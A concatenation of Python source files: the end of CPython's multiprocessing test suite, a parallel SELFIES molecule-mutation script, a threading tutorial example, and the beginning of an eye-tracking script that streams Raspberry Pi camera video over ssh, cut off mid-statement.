if self.TYPE == 'processes':
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
try:
multiprocessing.allow_connection_pickling()
except ImportError:
return
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
if self.TYPE == 'processes':
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
if hasattr(socket, 'fromfd'):
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(100), msg.upper())
else:
# XXX On Windows with Py2.6 need to backport fromfd()
discard = lconn.recv_bytes()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
"""
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in xrange(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
for L in heap._len_to_seq.values():
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', range(10), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0)
bar = copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call mutliprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
#
# Test that from ... import * works for each module
#
class _TestImportStar(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_import(self):
modules = [
'multiprocessing', 'multiprocessing.connection',
'multiprocessing.heap', 'multiprocessing.managers',
'multiprocessing.pool', 'multiprocessing.process',
'multiprocessing.reduction',
'multiprocessing.synchronize', 'multiprocessing.util'
]
if c_int is not None:
# This module requires _ctypes
modules.append('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
for attr in getattr(mod, '__all__', ()):
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL1, reader.recv())
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL2, reader.recv())
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = _multiprocessing.Connection(44977608)
self.assertRaises(IOError, conn.poll)
self.assertRaises(IOError, _multiprocessing.Connection, -1)
#
# Functions used to create test cases from the base ones in this module
#
def get_attributes(Source, names):
d = {}
for name in names:
obj = getattr(Source, name)
if type(obj) == type(get_attributes):
obj = staticmethod(obj)
d[name] = obj
return d
def create_test_cases(Mixin, type):
result = {}
glob = globals()
Type = type.capitalize()
for name in glob.keys():
if name.startswith('_Test'):
base = glob[name]
if type in base.ALLOWED_TYPES:
newname = 'With' + Type + name[1:]
class Temp(base, unittest.TestCase, Mixin):
pass
result[newname] = Temp
Temp.__name__ = newname
Temp.__module__ = Mixin.__module__
return result
#
# Create test cases
#
class ProcessesMixin(object):
TYPE = 'processes'
Process = multiprocessing.Process
locals().update(get_attributes(multiprocessing, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'RawValue',
'RawArray', 'current_process', 'active_children', 'Pipe',
'connection', 'JoinableQueue'
)))
testcases_processes = create_test_cases(ProcessesMixin, type='processes')
globals().update(testcases_processes)
class ManagerMixin(object):
TYPE = 'manager'
Process = multiprocessing.Process
manager = object.__new__(multiprocessing.managers.SyncManager)
locals().update(get_attributes(manager, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'list', 'dict',
'Namespace', 'JoinableQueue'
)))
testcases_manager = create_test_cases(ManagerMixin, type='manager')
globals().update(testcases_manager)
class ThreadsMixin(object):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
locals().update(get_attributes(multiprocessing.dummy, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'current_process',
'active_children', 'Pipe', 'connection', 'dict', 'list',
'Namespace', 'JoinableQueue'
)))
testcases_threads = create_test_cases(ThreadsMixin, type='threads')
globals().update(testcases_threads)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _ThisSubProcess(q):
try:
item = q.get(block=False)
except Queue.Empty:
pass
def _TestProcess(q):
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_ThisSubProcess, args=(queue,))
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=_TestProcess, args=(queue,))
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
testcases_other = [OtherTest, TestInvalidHandle, TestInitializers,
TestStdinBadfiledescriptor]
#
#
#
def test_main(run=None):
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, see issue 3111!")
if run is None:
from test.test_support import run_unittest as run
util.get_temp_dir() # creates temp directory for use by all processes
multiprocessing.get_logger().setLevel(LOG_LEVEL)
ProcessesMixin.pool = multiprocessing.Pool(4)
ThreadsMixin.pool = multiprocessing.dummy.Pool(4)
ManagerMixin.manager.__init__()
ManagerMixin.manager.start()
ManagerMixin.pool = ManagerMixin.manager.Pool(4)
testcases = (
sorted(testcases_processes.values(), key=lambda tc:tc.__name__) +
sorted(testcases_threads.values(), key=lambda tc:tc.__name__) +
sorted(testcases_manager.values(), key=lambda tc:tc.__name__) +
testcases_other
)
loadTestsFromTestCase = unittest.defaultTestLoader.loadTestsFromTestCase
suite = unittest.TestSuite(loadTestsFromTestCase(tc) for tc in testcases)
# (ncoghlan): Whether or not sys.exc_clear is executed by the threading
# module during these tests is at least platform dependent and possibly
# non-deterministic on any given platform. So we don't mind if the listed
# warnings aren't actually raised.
with test_support.check_py3k_warnings(
(".+__(get|set)slice__ has been removed", DeprecationWarning),
(r"sys.exc_clear\(\) not supported", DeprecationWarning),
quiet=True):
run(suite)
ThreadsMixin.pool.terminate()
ProcessesMixin.pool.terminate()
ManagerMixin.pool.terminate()
ManagerMixin.manager.shutdown()
del ProcessesMixin.pool, ThreadsMixin.pool, ManagerMixin.pool
def main():
test_main(unittest.TextTestRunner(verbosity=2).run)
if __name__ == '__main__':
main()
|
mutate_parr.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 31 12:15:57 2021
@author: akshat
"""
from __future__ import print_function
import rdkit
import random
import multiprocessing
from rdkit import Chem
from rdkit.Chem import MolFromSmiles as smi2mol
from rdkit.Chem import MolToSmiles as mol2smi
from selfies import encoder, decoder
manager = multiprocessing.Manager()
lock = multiprocessing.Lock()
def get_selfie_chars(selfie):
'''Obtain a list of all selfie characters in string selfie
Parameters:
selfie (string) : A selfie string - representing a molecule
Example:
>>> get_selfie_chars('[C][=C][C][=C][C][=C][Ring1][Branch1_1]')
['[C]', '[=C]', '[C]', '[=C]', '[C]', '[=C]', '[Ring1]', '[Branch1_1]']
Returns
-------
chars_selfie (list of strings) :
list of selfie characters present in molecule selfie
'''
chars_selfie = [] # A list of all SELFIE sybols from string selfie
while selfie != '':
chars_selfie.append(selfie[selfie.find('['): selfie.find(']')+1])
selfie = selfie[selfie.find(']')+1:]
return chars_selfie
def mutate_sf(sf_chars, alphabet):
'''
Given a list of SELFIES alphabets, make random changes to the molecule using
alphabet. Opertations to molecules are character replacements, additions and deletions.
Parameters
----------
sf_chars : (list of string alphabets)
List of string alphabets for a SELFIE string.
alphabet : (list of SELFIE strings)
Replacements and addition operations are performed using this list of SELFIE strings.
Returns
-------
Muatted SELFIE string.
'''
random_char_idx = random.choice(range(len(sf_chars)))
choices_ls = [1, 2, 3] # 1 = replacement; 2 = addition; 3=delete
mutn_choice = choices_ls[random.choice(range(len(choices_ls)))] # Which mutation to do:
if alphabet != []:
alphabet = random.sample(alphabet, 200) + ['[=N]', '[C]', '[S]','[Branch3_1]','[Expl=Ring3]','[Branch1_1]','[Branch2_2]','[Ring1]', '[#P]','[O]', '[Branch2_1]', '[N]','[=O]','[P]','[Expl=Ring1]','[Branch3_2]','[I]', '[Expl=Ring2]', '[=P]','[Branch1_3]','[#C]','[Cl]', '[=C]','[=S]','[Branch1_2]','[#N]','[Branch2_3]','[Br]','[Branch3_3]','[Ring3]','[Ring2]','[F]']
else:
alphabet = ['[=N]', '[C]', '[S]','[Branch3_1]','[Expl=Ring3]','[Branch1_1]','[Branch2_2]','[Ring1]', '[#P]','[O]', '[Branch2_1]', '[N]','[=O]','[P]','[Expl=Ring1]','[Branch3_2]','[I]', '[Expl=Ring2]', '[=P]','[Branch1_3]','[#C]','[Cl]', '[=C]','[=S]','[Branch1_2]','[#N]','[Branch2_3]','[Br]','[Branch3_3]','[Ring3]','[Ring2]','[F]']
# Mutate character:
if mutn_choice == 1:
random_char = alphabet[random.choice(range(len(alphabet)))]
change_sf = sf_chars[0:random_char_idx] + [random_char] + sf_chars[random_char_idx+1: ]
# add character:
elif mutn_choice == 2:
random_char = alphabet[random.choice(range(len(alphabet)))]
change_sf = sf_chars[0:random_char_idx] + [random_char] + sf_chars[random_char_idx: ]
# delete character:
elif mutn_choice == 3:
if len(sf_chars) != 1:
change_sf = sf_chars[0:random_char_idx] + sf_chars[random_char_idx+1: ]
else:
change_sf = sf_chars
return ''.join(x for x in change_sf)
def get_prop_material(smile, alphabet, num_random_samples, num_mutations):
'''
Given an input smile, perform mutations to the strucutre using provided SELFIE
alphabet list. 'num_random_samples' number of different SMILES orientations are
considered & total 'num_mutations' are performed.
Parameters
----------
smile : (str)
Valid SMILES string.
alphabet : (list of str)
list of SELFIE strings.
num_random_samples : (int)
Number of different SMILES orientations to be formed for the input smile.
num_mutations : TYPE
Number of mutations to perform on each of different orientations SMILES.
Returns
-------
mutated_smiles_canon : (list of strings)
List of unique molecules produced from mutations.
'''
mol = Chem.MolFromSmiles(smile)
Chem.Kekulize(mol)
# Obtain randomized orderings of the SMILES:
randomized_smile_orderings = []
for _ in range(num_random_samples):
randomized_smile_orderings.append(rdkit.Chem.MolToSmiles(mol, canonical=False, doRandom=True, isomericSmiles=False, kekuleSmiles=True))
# Convert all the molecules to SELFIES
selfies_ls = [encoder(x) for x in randomized_smile_orderings]
selfies_ls_chars = [get_selfie_chars(selfie) for selfie in selfies_ls]
# Obtain the mutated selfies
mutated_sf = []
for sf_chars in selfies_ls_chars:
for i in range(num_mutations):
if i == 0: mutated_sf.append(mutate_sf(sf_chars, alphabet))
else: mutated_sf.append(mutate_sf ( get_selfie_chars(mutated_sf[-1]), alphabet ))
mutated_smiles = [decoder(x) for x in mutated_sf]
mutated_smiles_canon = []
for item in mutated_smiles:
try:
smi_canon = Chem.MolToSmiles(Chem.MolFromSmiles(item, sanitize=True), isomericSmiles=False, canonical=True)
if len(smi_canon) <= 81: # Size restriction!
mutated_smiles_canon.append(smi_canon)
except:
continue
mutated_smiles_canon = list(set(mutated_smiles_canon))
return mutated_smiles_canon
def sanitize_smiles(smi):
'''
Return a canonical smile representation of smi
Parameters
----------
smi : str
smile string to be canonicalized
Returns
-------
mol (rdkit.Chem.rdchem.Mol) :
RdKit mol object (None if invalid smile string smi)
smi_canon (string) :
Canonicalized smile representation of smi (None if invalid smile string smi)
conversion_successful (bool):
True/False to indicate if conversion was successful
'''
try:
mol = smi2mol(smi, sanitize=True)
smi_canon = mol2smi(mol, isomericSmiles=False, canonical=True)
return (mol, smi_canon, True)
except:
return (None, None, False)
def get_chunks(arr, num_processors, ratio):
'''
Split list of SMILES int sublists, each of which will be operated on seperate cpus.
Parameters
----------
arr : (list of sts)
A list of SMILES.
num_processors : (int)
Number of cpus available for conducting operation.
ratio : (int)
number of operations that will be performed on each cpu.
Returns
-------
chunks: (list of lists)
Each sublist is used by a different cpu to perform operations.
'''
chunks = [] # Collect arrays that will be sent to different processorr
counter = int(ratio)
for i in range(num_processors):
if i == 0:
chunks.append(arr[0:counter])
if i != 0 and i<num_processors-1:
chunks.append(arr[counter-int(ratio): counter])
if i == num_processors-1:
chunks.append(arr[counter-int(ratio): ])
counter += int(ratio)
return chunks
def calc_parr_prop(unseen_smile_ls, property_name, props_collect, num_random_samples, num_mutations, alphabet):
'''Calculate logP for each molecule in unseen_smile_ls, and record results
in locked dictionary props_collect
'''
for smile in unseen_smile_ls:
props_collect[property_name][smile] = get_prop_material(smile, alphabet=alphabet, num_random_samples=num_random_samples, num_mutations=num_mutations) # TODO: TESTING
def create_parr_process(chunks, alphabet, property_name, num_random_samples, num_mutations):
'''
Create parallel processes for creating mutating molecules for molecule in sublist chunks.
Parameters
----------
chunks : (list of list)
list of lists containing SMILES.
property_name : (syr)
optional name paramtere to enter.
Returns
-------
combined_dict : (dict)
input smiles -> [List of mutated smiles].
'''
process_collector = []
collect_dictionaries = []
for item in chunks:
props_collect = manager.dict(lock=True)
smiles_map_ = manager.dict(lock=True)
props_collect[property_name] = smiles_map_
collect_dictionaries.append(props_collect)
if property_name == 'logP':
process_collector.append(multiprocessing.Process(target=calc_parr_prop, args=(item, property_name, props_collect, num_random_samples, num_mutations, alphabet, )))
for item in process_collector:
item.start()
for item in process_collector: # wait for all parallel processes to finish
item.join()
combined_dict = {} # collect results from multiple processess
for i,item in enumerate(collect_dictionaries):
combined_dict.update(item[property_name])
return combined_dict
def get_mutated_smiles(smiles, alphabet, space='Explore'):
num_processors = multiprocessing.cpu_count()
molecules_here_unique = list(set(smiles))
ratio = len(molecules_here_unique) / num_processors
chunks = get_chunks(molecules_here_unique, num_processors, ratio)
if space == 'Explore':
mut_smiles = create_parr_process(chunks, alphabet, 'logP', num_random_samples=5, num_mutations=5)
else:
mut_smiles = create_parr_process(chunks, alphabet, 'logP', num_random_samples=400, num_mutations=400)
return mut_smiles
if __name__ == '__main__':
molecules_here = ['CCC', 'CCCC', 'CCCCC', 'CCCCCCCC', 'CS', 'CSSS', 'CSSSSS', 'CF', 'CI', 'CBr', 'CSSSSSSSSSSSS', 'CSSSSSSSSSC', 'CSSSSCCSSSC', 'CSSSSSSSSSF', 'SSSSSC']
A = get_mutated_smiles(molecules_here, alphabet=['[C]']*500, space='Explore')
|
Chap10_Example10.13.py
|
from threading import *
from time import sleep
def display(num1,num2):
print(f"{current_thread().name} thread started")
sleep(1)
mul = num1 * num2
print(f"{current_thread().name} executing display function with value {mul}")
myt1 = Thread(target = display, name= "MyChildThread1",args = (10,20))
myt2 = Thread(target = display, name= "MyChildThread2",args = (30,40))
myt3 = Thread(target = display, name= "MyChildThread3",args = (50,60))
print("The total number of active threads before child thread start are: ", active_count())
myt1.start()
myt2.start()
myt3.start()
print(f"Is {myt1.name} alive: ",myt1.isAlive())
print(f"Is {myt2.name} alive: ",myt2.isAlive())
print(f"Is {myt3.name} alive: ",myt3.isAlive())
sleep(5)
print(f"Is {myt1.name} alive after MainThread sleep for 5 secs: ",myt1.isAlive())
print(f"Is {myt2.name} alive after MainThread sleep for 5 secs: ",myt2.isAlive())
print(f"Is {myt3.name} alive after MainThread sleep for 5 secs: ",myt3.isAlive())
|
gaze.py
|
#!/usr/bin/env python
import cv2
import os
import subprocess as sp
import sys
import numpy as np
import time
# import datetime
from matrix import get_pupil_transformation_matrix
from threading import Thread
sys.path.append(os.path.abspath('../../TEST'))
sys.path.append(os.path.abspath('../../TEST/shared_modules'))
from pupil_detectors import Detector_3D
from methods import Roi
sys.path.append(os.path.abspath('../'))
# from calibrateHaar import calibrate
# from pbcvt import findPupilEllipse
# from params import pupil_tracker_params
from cameras import cam0mat as cameraMatrix0
from cameras import cam0dcoef as distCoeffs0
from cameras import cam1mat as cameraMatrix1
from cameras import cam1dcoef as distCoeffs1
cameraMatrix0 = np.array(cameraMatrix0)
distCoeffs0 = np.array(distCoeffs0)
cameraMatrix1 = np.array(cameraMatrix1)
distCoeffs1 = np.array(distCoeffs1)
# from cameras import cam1mat as cameraMatrix1
# from cameras import cam1dcoef as distCoeffs1
TIMEOUT = 10000
FFMPEG_BIN = "ffmpeg"
'''
This code will be able to open fast and low latency streams
and capture and save photos from webcams and network raspberry pi's
The Readme.txt in this dir will help with debugging
'''
class WebcamVideoStream:
def __init__(self, src=None, fifo=None):
# initialize the video camera stream and read the first frame
# from the stream
# self.stream = cv2.VideoCapture(src)
# (self.grabbed, self.frame) = self.stream.read()
###
if fifo == 'fifo0':
self.height = 640
self.width = 480
elif fifo == 'fifo1':
self.height = 480
self.width = 640
else:
print('error please specify what camera type ')
raise (Exception)
if not fifo:
fifo = 'fifo0'
print("no input using fifo0")
print("about to init command")
command = [
FFMPEG_BIN,
'-i',
fifo,
'-pix_fmt',
'bgr24', # opencv requires bgr24 pixel format.
'-vcodec',
'rawvideo',
'-an',
'-sn',
'-f',
'image2pipe',
'-'
] # '-framerate', '100',
print("about to sp.popen")
self.pipe = sp.Popen(command, stdout=sp.PIPE, bufsize=1024)
print("about read first frame")
try:
raw_image = self.pipe.stdout.read(self.height * self.width * 3)
self.image = np.fromstring(
raw_image, dtype='uint8'
).reshape((self.height, self.width, 3))
except Exception:
self.image = np.zeros((self.height, self.width, 3))
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
print("starting thread")
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
print("starting while true loop")
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
self.pipe.kill()
return
raw_image = self.pipe.stdout.read(self.height * self.width * 3)
self.image = np.fromstring(
raw_image, dtype='uint8'
).reshape((self.height, self.width, 3))
self.pipe.stdout.flush()
# otherwise, read the next frame from the stream
# (self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.image
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
def draw_ellipse(
img,
center,
axes,
angle,
startAngle,
endAngle,
color,
thickness=3,
lineType=cv2.LINE_AA,
shift=10
):
center = (int(round(center[0] * 2**shift)), int(round(center[1] * 2**shift)))
axes = (int(round(axes[0] * 2**shift)), int(round(axes[1] * 2**shift)))
cv2.ellipse(
img,
center,
axes,
angle,
startAngle,
endAngle,
color,
thickness,
lineType,
shift,
)
class Frame(object):
def __init__(self, camType):
if camType == 0:
self.height = 640
self.width = 480
elif camType == 1:
self.height = 480
self.width = 640
self.gray = np.zeros((self.height, self.width))
self.img = np.zeros((self.height, self.width, 3))
self.timestamp = time.time()
def solveperp(objectPoints, imagePoints, cameraMatrix, distCoeffs, method):
if method == 1:
return cv2.solvePnP(objectPoints, imagePoints, cameraMatrix, distCoeffs)
elif method == 2:
return cv2.solvePnPRansac(objectPoints, imagePoints, cameraMatrix, distCoeffs)
else:
return cv2.solveP3P(objectPoints, imagePoints, cameraMatrix, distCoeffs)
def draw_gaze(img, start, end, H, K, dist):
# unit is mm
try:
rvec, _ = cv2.Rodrigues(H[:3, :3])
tvec = H[:3, 3]
points = np.float32([
start,
end,
]).reshape(-1, 3)
axisPoints, _ = cv2.projectPoints(points, rvec, tvec, K, dist)
img = cv2.arrowedLine(
img, tuple(axisPoints[0].ravel()), tuple(axisPoints[1].ravel()),
(0, 255, 0), 3
)
except OverflowError:
pass
return img
def draw_plane(img, corners, H, K, dist):
# unit is mm
try:
rvec, _ = cv2.Rodrigues(H[:3, :3])
tvec = H[:3, 3]
points = np.float32(corners).reshape(-1, 3)
axisPoints, _ = cv2.projectPoints(points, rvec, tvec, K, dist)
img = cv2.arrowedLine(
img, tuple(axisPoints[0].ravel()), tuple(axisPoints[1].ravel()),
(0, 0, 255), 3
)
img = cv2.arrowedLine(
img, tuple(axisPoints[1].ravel()), tuple(axisPoints[2].ravel()),
(255, 0, 0), 3
)
img = cv2.arrowedLine(
img, tuple(axisPoints[2].ravel()), tuple(axisPoints[3].ravel()),
(255, 0, 0), 3
)
img = cv2.arrowedLine(
img, tuple(axisPoints[3].ravel()), tuple(axisPoints[0].ravel()),
(255, 0, 0), 3
)
except OverflowError:
pass
return img
def lineIntersection(planePoint, planeNormal, linePoint, lineDirection):
if np.dot(planeNormal, lineDirection) == 0:
return planePoint
t = (np.dot(planeNormal, planePoint) -
np.dot(planeNormal, linePoint)) / np.dot(planeNormal, lineDirection)
return linePoint + t * lineDirection
# class Roi(object):
# """this is a simple 2D Region of Interest class
# it is applied on numpy arrays for convenient slicing
# like this:
# roi_array_slice = full_array[r.view]
# # do something with roi_array_slice
# this creates a view, no data copying done
# """
# def __init__(self, array_shape):
# self.array_shape = array_shape
# self.lX = 0
# self.lY = 0
# self.uX = array_shape[1]
# self.uY = array_shape[0]
# self.nX = 0
# self.nY = 0
# open a named pipe for each pi and start listening
pipeinit0 = sp.Popen(['./r0.sh'], stdout=sp.PIPE)
pipeinit1 = sp.Popen(['./r1.sh'], stdout=sp.PIPE)
# start streaming from the pi to this computer
sshPi0 = sp.Popen(['ssh', 'pi@10.0.0.3', '-p', '6622', '~/stream.sh'], stdout=sp.PIPE)
vs0 = WebcamVideoStream(fifo="fifo0").start()
print()
print()
print('Fifo 0 started')
print()
print()
sshPi1 = sp.Popen(['ssh', 'pi@10.0.0.5', '~/stream.sh'], stdout=sp.PIPE)
vs1 = WebcamVideoStream(fifo="fifo1").start()
print()
print()
print('Fifo 1 started')
print()
print()
# i = 0
# j = 0
frame = Frame(0)
roi = Roi(frame.img.shape)
cv2.namedWindow('Video0')
cv2.namedWindow('Video1')
# cv2.namedWindow('aruco')
vout0 = None
vout1 = None
if len(sys.argv) > 1:
fourcc = cv2.VideoWriter_fourcc(*'x264')
vout0 = cv2.VideoWriter(
'demo0.mp4', fourcc, 24.0, (frame.img.shape[1], frame.img.shape[0])
)
vout1 = cv2.VideoWriter(
'demo1.mp4', fourcc, 24.0, (frame.img.shape[0], frame.img.shape[1])
)
# ACTUAL STUFF BELOW
pupil_detector = Detector_3D()
pupil_detector.set_2d_detector_property('pupil_size_max', 150)
# pupil_detector.set_2d_detector_property('pupil_size_min', 10)
# pupil_detector.set_2d_detector_property('ellipse_roundness_ratio', 0.1)
# pupil_detector.set_2d_detector_property('coarse_filter_max', 240)
# pupil_detector.set_2d_detector_property('intensity_range', 30)
# pupil_detector.set_2d_detector_property('canny_treshold', 200)
# pupil_detector.set_2d_detector_property('canny_ration', 3)
# pupil_detector.set_2d_detector_property('support_pixel_ratio_exponent', 3.0)
# pupil_detector.set_2d_detector_property('initial_ellipse_fit_treshhold', 1.5)
'''
'coarse_detection': True,
'coarse_filter_min': 128,
'coarse_filter_max': 280,
'intensity_range': 23,
'blur_size': 5,
'canny_treshold': 160,
'canny_ration': 2,
'canny_aperture': 5,
'pupil_size_max': 100,
'pupil_size_min': 10,
'strong_perimeter_ratio_range_min': 0.8,
'strong_perimeter_ratio_range_max': 1.1,
'strong_area_ratio_range_min': 0.6,
'strong_area_ratio_range_max': 1.1,
'contour_size_min': 5,
'ellipse_roundness_ratio': 0.1,
'initial_ellipse_fit_treshhold': 1.8,
'final_perimeter_ratio_range_min': 0.6,
'final_perimeter_ratio_range_max': 1.2,
'ellipse_true_support_min_dist': 2.5,
'support_pixel_ratio_exponent': 2.0
'''
objPoints = np.array(
